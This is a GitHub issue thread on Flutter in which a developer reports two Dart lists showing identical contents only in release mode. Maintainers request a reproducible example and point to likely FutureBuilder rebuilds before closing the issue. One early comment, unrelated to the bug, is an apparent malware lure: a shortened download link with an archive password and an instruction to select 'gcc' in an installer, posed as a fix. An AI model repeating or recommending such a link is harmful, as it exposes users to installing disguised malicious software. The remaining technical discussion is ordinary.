### ISSUE TITLE
Same type variables seem to get optimized out in release mode despite being two different by name declarations

### ISSUE THREAD

**Issue by maltalef101** [flutter/flutter#154188] opened 2024-08-27 17:00 UTC
### Steps to reproduce

there are two `List`s with the same inner type `Product` (I don't think the particular implementation or structure of the inner type is relevant here, but I am open to give extra information if needed) that end up having the same exact number of items and content despite being two different variables that get `.add()`ed to conditionally based on a preexisting condition.

I've tried marking them as `final`, but with no change in release mode. 

this behavior I've only seen in a Linux runtime, as that's what I'm developing on and expecting to deploy to.

if needed I'm able to try and reproduce this behavior in a self-contained and simpler example using the same Flutter version that I'm working with right now, but I think the code is pretty simple as it is.

### Expected results

the two variables **shouldn't** have the same exact number of items and content as it is determined by an `if` statement that conditionally adds to them. this is what happens in `debug` and `profile` run modes.

### Actual results

they have the same data inside, and I mean the EXACT same.

the calls to `print` are to determine if the conditional logic is at flaw in this scenario, and in a case where only the `if` predicate gets executed (because all of the items comply with the `if` condition), only the first one `"new items"` is printed out to the console. despite this result, in a subsequent screen where the two lists are displayed separate of one another, the content is the same for both of them.

my only guess is that because of the variables being of the same type they are getting treated as only one when the code is heavily optimized in release mode. I can't even begin to understand why this doesn't happen in profile mode where some optimizations are at play. 

### Code sample

<details open><summary>Code sample</summary>

```dart
  List<Product> newItems = [];
  List<Product> updatedItems = [];

  for (final item in parsed) {
    var idField = item[headerIdxs.idIdx];
    if (idField == null || idField == '') {
      print('new item');
      var newProduct = Product.fromList(item, headerIdxs);
      newItems.add(newProduct);
    } else {
      print('updated item');
      var updatedProduct = Product.fromList(item, headerIdxs);
      updatedItems.add(updatedProduct);
    }
  }

```

</details>

### Screenshots or Video

<details open>
<summary>Screenshots / Video demonstration</summary>

</details>

### Logs

<details open><summary>Logs</summary>
No logs applicable (I think). I am able to upload this information if needed.
</details>

### Flutter Doctor output

<details open><summary>Doctor output</summary>

```console
[✓] Flutter (Channel stable, 3.19.0, on NixOS 24.05 (Uakari) 6.8.4-zen1, locale en_US.UTF-8)
    • Flutter version 3.19.0 on channel stable at /nix/store/m0w19afr102c3hi0lal89880splbrm54-flutter-wrapped-3.19.0-sdk-links
    • Upstream repository https://github.com/flutter/flutter.git
    • Framework revision nixpkgs000 (), 1970-01-01 00:00:00
    • Engine revision 04817c99c9
    • Dart version 3.3.0
    • DevTools version 2.31.1

[✗] Android toolchain - develop for Android devices
    ✗ Unable to locate Android SDK.
      Install Android Studio from: https://developer.android.com/studio/index.html
      On first launch it will assist you in installing the Android SDK components.
      (or visit https://flutter.dev/docs/get-started/install/linux#android-setup for detailed instructions).
      If the Android SDK has been installed to a custom location, please use
      `flutter config --android-sdk` to update to that location.


[✗] Chrome - develop for the web (Cannot find Chrome executable at google-chrome)
    ! Cannot find Chrome. Try setting CHROME_EXECUTABLE to a Chrome executable.

[✓] Linux toolchain - develop for Linux desktop
    • clang version 17.0.6
    • cmake version 3.28.3
    • ninja version 1.11.1
    • pkg-config version 0.29.2

[!] Android Studio (not installed)
    • Android Studio not found; download from https://developer.android.com/studio/index.html
      (or visit https://flutter.dev/docs/get-started/install/linux#android-setup for detailed instructions).

[✓] Connected device (1 available)
    • Linux (desktop) • linux • linux-x64 • NixOS 24.05 (Uakari) 6.8.4-zen1

[✓] Network resources
    • All expected network resources are available.

! Doctor found issues in 3 categories.

```

</details>

Thanks in advance for any advice or help given. This seems really wrong.

**Comment by c0ffincolors** [comment] 2024-08-27 17:01
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by moffatman** [comment] 2024-08-27 21:05
I think you need to add more code to make a complete reproducible example. Eg. we don't have `parsed` or `headerIdxs` here to run. Or the `Product` class definition

**Comment by maltalef101** [comment] 2024-08-27 22:34
I apologize. 

`parsed` is a `List<List<dynamic>>`, which is the output of a `CsvToListConverter.convert()` from the `csv` package.

```dart
typedef HeaderIdxs = ({
  int idIdx,
  int categoryIdx,
  int? groupIdx,
  int? subgroupIdx,
  int nameIdx,
  int locationIdx,
  int? panelIdx,
  int codeIdx,
  int variantIdx,
  int brandIdx,
  int? statusIdx,
  int? calibrationIdx,
  int? availableIdx
});

final class Product {
  String? id;
  String category;
  String? group;
  String? subgroup;
  String name;
  String location;
  String? panel;
  String code;
  String variant;
  String brand;
  String status;
  String calibration;
  bool available;

  Product._create({
    required this.id,
    required this.category,
    required this.group,
    required this.subgroup,
    required this.name,
    required this.location,
    required this.panel,
    required this.code,
    required this.variant,
    required this.brand,
    required this.calibration,
    required this.status,
    required this.available,
  });

  factory Product.fromList(List<dynamic> item, HeaderIdxs headers) {
    var id = item[headers.idIdx];
    var category = item[headers.categoryIdx];
    var group = item[headers.groupIdx!];
    var subgroup = item[headers.subgroupIdx!];
    var name = item[headers.nameIdx];
    var location = item[headers.locationIdx];
    var panel = item[headers.panelIdx!];
    var code = item[headers.codeIdx];
    var variant = item[headers.variantIdx];
    var brand = item[headers.brandIdx];
    var status = item[headers.statusIdx!] ?? 'Bueno';
    var calibration = item[headers.calibrationIdx!] ??
        DateTime.now().toUtc().toIso8601String();
    var available = bool.parse(item[headers.availableIdx!]);

    var product = Product._create(
      id: id,
      category: category,
      group: group,
      subgroup: subgroup,
      name: name,
      location: location,
      panel: panel,
      code: code,
      variant: variant,
      brand: brand,
      status: status,
      calibration: calibration,
      available: available,
    );

    return product;
  }

  Map<String, dynamic> toJson() => {
        'id': id,
        'category': category,
        'group': group,
        'subgroup': subgroup,
        'name': name,
        'location': location,
        'panel': panel,
        'code': code,
        'variant': variant,
        'brand': brand,
        'status': status,
        'calibration': calibration,
        'available': available,
      };
}
```
Let me know if more information is needed or if I should edit the original code sample to comply with requirements.

**Comment by moffatman** [comment] 2024-08-27 23:32
I still don't have the data needed to run the example. It would be great to provide some script + data file or whatever's needed for you to see it.

**Comment by maltalef101** [comment] 2024-08-27 23:39
I could provide all of the code for the particular screen but I am reluctant to as it depends on external input in the form of a csv file that gets parsed. The whole implementation is around 400 and 500 LOC not including what loads the screen in place, handling of the global app state, and other miscellaneous extracts that make the program work. I apologize for the inconvenience and I understand this is a complex issue to reproduce.

**Comment by moffatman** [comment] 2024-08-28 00:06
The reason I ask is, your proposed explanation is really unbelievable. I think it's probably just some other bug in your code. And I'm happy to help find it. But what you've sent so far is not enough to even show the problem. 

If you don't want to share the code, I would be interested in the output of adding `print(newItems);` and `print(updatedItems);` within the loop.

**Comment by maltalef101** [comment] 2024-08-28 00:16
I agree with your suspicion and as I've stated before my explanation is only a misinformed guess on what's happening behind the scenes with optimizations. But, again, and you've gotta believe me on this, it only happens in release mode, and I don't have any code written that only is compiled when run in release mode as I don't know how to do that and I'm not even sure if It's really possible. I can assure I've tested it with the same code all around and made sure there were no changes between launching in different modes, and the behavior is as stated. I will be doing the requested and posting the result briefly. Thanks.

**Comment by maltalef101** [comment] 2024-08-28 00:42
The final for loop extract:
```dart
  for (final item in parsed) {
    var idField = item[headerIdxs.idIdx];
    if (idField == null || idField == '') {
      var newProduct = Product.fromList(item, headerIdxs);
      newItems.add(newProduct);
    } else {
      var updatedProduct = Product.fromList(item, headerIdxs);
      updatedItems.add(updatedProduct);
    }
    print('newItems:');
    print(newItems);
    print('updatedItems:');
    print(updatedItems);
  }
```

The output of what you requested seems to be on par to the expected behavior. (csv truncated manually using LibreOffice to 150 entries from 1334 to reduce output length, only copied output of the last iteration)
```
flutter: newItems:
flutter: [Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product']
flutter: updatedItems:
flutter: []
``` 
But what is shown on screen doesn't concur with this information.
![image](https://github.com/user-attachments/assets/9ae6d66d-cb05-43b0-995e-241ba3afd671)
"Artículos nuevos" corresponds to `newItems` and "Artículos a actualizar" corresponds to `updatedItems`
As you can see the item count is exactly the same, and the content of the two lists is as well, as shown in the following:

"Artículos nuevos" list:
![image](https://github.com/user-attachments/assets/de42304b-daf9-4e39-b85a-e6fecb0d1417)

"Artículos a actualizar" list: 
![image](https://github.com/user-attachments/assets/0f9b1a67-da8e-4d0f-92b9-ed293c45c5a4)

Then, running the same application in debug mode with no changes other than the ones requested for debugging purposes and the result is the following:

```
flutter: newItems:
flutter: [Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product', Instance of 'Product']
flutter: updatedItems:
flutter: []
```

"Artículos nuevos" list: 
![image](https://github.com/user-attachments/assets/bebbe6da-3f16-44ac-9558-478a25744ad7)

"Artículos a actualizar" list: 
![image](https://github.com/user-attachments/assets/97c7e58b-4888-4b50-87f0-8de54b1870d6)

This last example is the expected behavior that should be present in release mode, but for some odd reason it isn't.

I reinstate, no code changes except the ones that you requested were made in between both executions in release and debug mode, respectively.
 
I get that this is **weird** behavior and you're completely on point taking my report with a grain of salt.

**Comment by maltalef101** [comment] 2024-08-28 00:48
The paginated lists are done with a class that extends `DataTableSource` that are being declared and initialized with the following:

```dart
  // ... in widget state class
  late DataSource _newItemsDataSource;
  late DataSource _updatedItemsDataSource;
```

```dart
  // ... in same widget state class initState()
  _newItemsDataSource = DataSource(widget.newItems);
  _updatedItemsDataSource = DataSource(widget.updatedItems);
```

They are being referenced separately. I can assure you that there were not any confusions, as this issue only came up once I started testing the code I'd been writing fully in debug mode, now in release mode.

**Comment by moffatman** [comment] 2024-08-28 01:06
I believe you there are certainly differences in behaviour between debug and release mode. But just I don't think it's any compiler optimization. If variables are getting misplaced a lot more things would be broken....
From your log it shows the array construction goes fine during the loop. so something goes wrong afterwards. therefore we need the source code of DataSource.
Btw where are these lists being constructed. In some static context? or somewhere in the widget tree in a build() method?

**Comment by maltalef101** [comment] 2024-08-28 01:31
the first part of the data flow is this `FutureBuilder` that executes `parseCsv()`, an async first level function that gets the file contents from a `Future<String>` parameter. this is what returns those `newitems` and `updatedItems` that I thought to be the source of the issue.

```dart
Future<
    ({
      List<dynamic> headers,
      List<Product> newItems,
      List<Product> updatedItems,
      List<List<dynamic>> incorrectItems
    })> parseCsv(Future<String> value) async {
  var parsed = await Future.sync(() async {
    var val = await value;
    CsvToListConverter? converter;

    
    converter = const CsvToListConverter(
      eol: '\n',
      shouldParseNumbers: false,
      convertEmptyTo: EmptyValue.NULL,
    );

    final res = converter!.convert(val);

    return res;
  });

  var headers = parsed.removeAt(0);
  var headerIdxs = getHeaderIdxs(headers);

 
  if (headerIdxs.idIdx == -1 ||
      headerIdxs.categoryIdx == -1 ||
      headerIdxs.nameIdx == -1 ||
      headerIdxs.locationIdx == -1 ||
      headerIdxs.codeIdx == -1 ||
      headerIdxs.variantIdx == -1 ||
      headerIdxs.brandIdx == -1) {
    
    return Future.error(Exception('Formato inválido.'));
  }

  List<List<dynamic>> incorrectItems = [];


  List<Product> newItems = [];
  List<Product> updatedItems = [];

  for (final item in parsed) {
    var idField = item[headerIdxs.idIdx];
    if (idField == null || idField == '') {
      var newProduct = Product.fromList(item, headerIdxs);
      newItems.add(newProduct);
    } else {
      var updatedProduct = Product.fromList(item, headerIdxs);
      updatedItems.add(updatedProduct);
    }
    print('newItems:');
    print(newItems);
    print('updatedItems:');
    print(updatedItems);
  }

  return (
    headers: headers,
    newItems: newItems,
    updatedItems: updatedItems,
    incorrectItems: incorrectItems
  );
}
```
the result of this function is awaited from a `FutureBuilder`, this time in the `build()` function of a widget that represents that route 
```dart
class ProductImportScreen extends StatefulWidget {
  const ProductImportScreen({super.key});

  @override
  State<ProductImportScreen> createState() => _ProductImportScreenState();
}

class _ProductImportScreenState extends State<ProductImportScreen> {
  @override
  Widget build(BuildContext context) {
    var appState = context.watch<AppState>();

    return Scaffold(
      appBar: appBar(context, 'Importar artículos'),
      body: FutureBuilder<dynamic>(
        future: parseCsv(appState.filePicked!.readAsString()),
        builder: (BuildContext context, AsyncSnapshot<dynamic> snapshot) {
          if (snapshot.hasData) {
            var data = snapshot.data!;
            return ProductImportWidget(
              headers: data.headers,
              newItems: data.newItems,
              updatedItems: data.updatedItems,
              incorrectItems: data.incorrectItems,
            );
          } else if (snapshot.hasError) {
            return Center(
              child: Column(
                mainAxisAlignment: MainAxisAlignment.center,
                children: [
                  const Icon(
                    Icons.error_outline,
                    color: Colors.red,
                    size: 60,
                  ),
                  Padding(
                    padding: const EdgeInsets.only(top: 16),
                    child: Text('Error: ${snapshot.error}'),
                  ),
                ],
              ),
            );
          } else {
            return const Center(
              child: CircularProgressIndicator(),
            );
          }
        },
      ),
    );
  }
}
```

the argument passed to `parseCsv()` is taken from a global AppState implemented with `ChangeNotifier` and the `provider` package's `ChangeNotifierProvider` in the most high level `runApp()`.

at this point in time, given the overall flow of execution in the entire app (more code not regarding this screen in particular) we can expect that `appState.filePicked` is not `null`. 

`DataSource` implementation:
```dart
class DataSource extends DataTableSource {
  final List<Product> _data;
  final Set<int> _selectedIdxs = <int>{};

  DataSource(this._data);

  void selectRow(int index, bool selected) {
    if (selected) {
      _selectedIdxs.add(index);
    } else {
      _selectedIdxs.remove(index);
    }

    notifyListeners();
  }

  bool isSelected(int index) => _selectedIdxs.contains(index);

  List<Product> get selectedItems =>
      _selectedIdxs.map((int index) => _data[index]).toList();

  @override
  int get rowCount => _data.length;

  @override
  DataRow getRow(int index) {
    final item = _data[index];
    DataCell availableCell;

    if (item.available) {
      availableCell = const DataCell(
        Center(child: Icon(Icons.check_circle_outline, color: Colors.green)),
      );
    } else {
      availableCell = const DataCell(
        Center(child: Icon(Icons.cancel_outlined, color: Colors.red)),
      );
    }

    return DataRow(
      selected: isSelected(index),
      onSelectChanged: (selected) => selectRow(index, selected!),
      cells: [
        DataCell(Text(item.id ?? '')),
        DataCell(Text(item.category)),
        DataCell(Text(item.group ?? '')),
        DataCell(Text(item.subgroup ?? '')),
        DataCell(Text(item.name)),
        DataCell(Text(item.location)),
        DataCell(Text(item.panel ?? '')),
        DataCell(Text(item.code)),
        DataCell(Text(item.variant)),
        DataCell(Text(item.brand)),
        DataCell(Text(item.status)),
        DataCell(Text(item.calibration)),
        availableCell,
      ],
    );
  }

  @override
  bool get isRowCountApproximate => false;

  @override
  int get selectedRowCount => _selectedIdxs.length;
}
```
this is almost all of the code that follows that composes the `ProductImportWidget` and what classes are used from inside that widget: (note that _
```
class PanelItem {
  String header;
  Widget expandedValue;
  bool expanded;

  PanelItem({
    required this.header,
    required this.expandedValue,
    this.expanded = false,
  });
}

class ProductImportWidget extends StatefulWidget {
  final List<dynamic> headers;
  final List<Product> newItems;
  final List<Product> updatedItems;
  final List<List<dynamic>> incorrectItems;

  const ProductImportWidget({
    super.key,
    required this.headers,
    required this.newItems,
    required this.updatedItems,
    required this.incorrectItems,
  });

  @override
  State<ProductImportWidget> createState() => _ProductImportWidgetState();
}

class _ProductImportWidgetState extends State<ProductImportWidget> {
  final List<PanelItem> _panels = [];
  final List<DataColumn> _columns = const [
    DataColumn(label: Text('ID')),
    DataColumn(label: Text('Categoría')),
    DataColumn(label: Text('Grupo')),
    DataColumn(label: Text('Subgrupo')),
    DataColumn(label: Text('Nombre')),
    DataColumn(label: Text('Ubicación')),
    DataColumn(label: Text('Tablero')),
    DataColumn(label: Text('Código')),
    DataColumn(label: Text('Variante')),
    DataColumn(label: Text('Marca')),
    DataColumn(label: Text('Estado')),
    DataColumn(label: Text('Calibración')),
    DataColumn(label: Text('Disponible')),
  ];

  late DataSource _newItemsDataSource;
  late DataSource _updatedItemsDataSource;

  @override
  void initState() {
    super.initState();

    _newItemsDataSource = DataSource(widget.newItems);
    _updatedItemsDataSource = DataSource(widget.updatedItems);

    _panels.add(
      PanelItem(
        header: 'Artículos nuevos (${widget.newItems.length})',
        expandedValue: Padding(
          padding: const EdgeInsets.fromLTRB(3.0, 0, 3.0, 3.0),

          child: PaginatedDataTable(
            source: _newItemsDataSource,
            columns: _columns,
            rowsPerPage: 10,
            showFirstLastButtons: true,
            onSelectAll: (selected) {
              if (selected != null) {
                setState(() {
                  for (int i = 0; i < _newItemsDataSource.rowCount; i++) {
                    _newItemsDataSource.selectRow(i, selected);
                  }
                });
              }
            },
          ),
        ),
      ),
    );

    _panels.add(
      PanelItem(
        header: 'Artículos a actualizar (${widget.updatedItems.length})',
        expandedValue: Padding(
          padding: const EdgeInsets.fromLTRB(3.0, 0, 3.0, 3.0),

          child: PaginatedDataTable(
            source: _updatedItemsDataSource,
            columns: _columns,
            rowsPerPage: 10,
            showFirstLastButtons: true,
            onSelectAll: (selected) {
              if (selected != null) {
                setState(() {
                  for (int i = 0; i < _updatedItemsDataSource.rowCount; i++) {
                    _updatedItemsDataSource.selectRow(i, selected);
                  }
                });
              }
            },
          ),
        ),
      ),
    );
  }

  Widget _buildPanelList() {
    return ExpansionPanelList(
      expansionCallback: (int index, bool isExpanded) {
        setState(() => _panels[index].expanded = isExpanded);
      },
      children: _panels.map<ExpansionPanel>((PanelItem item) {
        return ExpansionPanel(
          canTapOnHeader: true,
          headerBuilder: (BuildContext context, bool isExpanded) {
            return ListTile(title: Text(item.header));
          },
          body: item.expandedValue,
          isExpanded: item.expanded,
        );
      }).toList(),
    );
  }

  void upload(BuildContext context) {
    var appState = Provider.of<AppState>(context, listen: false);

    if (_newItemsDataSource.selectedRowCount == 0 && _updatedItemsDataSource.selectedRowCount == 0) {
      ScaffoldMessenger.of(context).showSnackBar(
        SnackBar(
          content: const Text('No hay ítems seleccionados.'),

          duration: const Duration(seconds: 5),
          action: SnackBarAction(
            label: 'Cerrar',
            onPressed: () =>
                ScaffoldMessenger.of(context).hideCurrentSnackBar(),

          ),
        ),
      );

      return;
    }

    var selected = _newItemsDataSource.selectedItems;
    selected.addAll(_updatedItemsDataSource.selectedItems);
    appState.selectedItems = selected;
    Navigator.pushNamed(context, '/upload');
  }

  @override
  Widget build(BuildContext context) {
    return Scaffold(
      floatingActionButton: FloatingActionButton.extended(
        onPressed: () {
          upload(context);
        },
        icon: const Icon(Icons.arrow_forward),
        label: const Text('Subir'),
      ),
      body: SingleChildScrollView(
        child: Padding(
          padding: const EdgeInsets.all(12.0),
          child: Center(
            child: Column(
              mainAxisAlignment: MainAxisAlignment.center,
              children: <Widget>[
                _buildPanelList(),
              ],
            ),
          ),
        ),
      ),
    );
  }
}
```

i guess that pasting all of the related code wasn't much of a hassle, sorry.

i know that this is a bit lengthy already, but if something else is needed please let me know.

**Comment by moffatman** [comment] 2024-08-28 05:15
I still wasn't able to run it. Missing the class `AppState`, and the functions `appBar` and `getHeaderIdxs`.

As a comment there is a lot of use of `dynamic`, I would try to remove that by specifying exact types. It's possible that may help find the bug by letting the analyzer find some misuses of variables.

Also `FutureBuilder` is rarely the right option. The function `parseCsv` may be getting executed a different number of times in release mode than in debug mode. Since I think it is re-ran every time `_ProductImportScreenState` builds.

**Comment by darshankawar** [comment] 2024-08-28 08:25
From above conversation, it seems the issue could most likely is in the code implementation rather than a bug in framework. Also, without a concrete reproducible code sample (without third party implementation) would be tough to analyze the reported behavior.
Maybe continuing the discussion in discord would be a better option. @moffatman wdyt ?

**Comment by maltalef101** [comment] 2024-08-28 18:21
`_ProductImportScreenState` only should build once when the route is loaded, and I think it does because there's nothing in its workings that should trigger a rebuild. If something is being rebuilt in this case it's `_ProductImportWidgetState` that's what actually handles the display and selection of the data parsed.

**Comment by darshankawar** [comment] 2024-08-29 06:25
Please provide us runnable code sample that is minimal and without third party implementations, because we tried the code sample you provided earlier, but couldn't run it properly.

**Comment by maltalef101** [comment] 2024-08-29 13:01
I apologize for the inconvenience. I agree that the code sample is not in any way minimal. When I have some more time I'll try to make a reproducible example using only flutter code (should it be in dartpad? I don't seem to remember if it has an option for running in both debug and release mode). I'd like to add a comment as well. From the outside it could seem that the misbehavior in release mode is coming from a bug in my implementation, but I can't seem to find any problems when running in debug or profile mode, as it works as expected. This seems really weird as it is right now and the only workaround I've seen to encounter is distributing in profile mode rather than release mode because of this difference in behavior. In the meantime, what should I be trying? Is it the usage of `FutureBuilder` as mentioned earlier? I can't seem to get my head around this issue, being that it only appears in release mode.

**Comment by moffatman** [comment] 2024-08-29 13:25
Add me on discord (moffatman) and pm me your repo or something if you can't post it publically. probably I can figure it out from running the full code.

**Comment by darshankawar** [comment] 2024-08-30 05:48
I will close this for now. @maltalef101 Please follow above comment. If a bug is discovered in framework after discussion, please write in comments and I'll reopen it.

**Closed by darshankawar** 2024-08-30 05:48 UTC
Labels: in triage
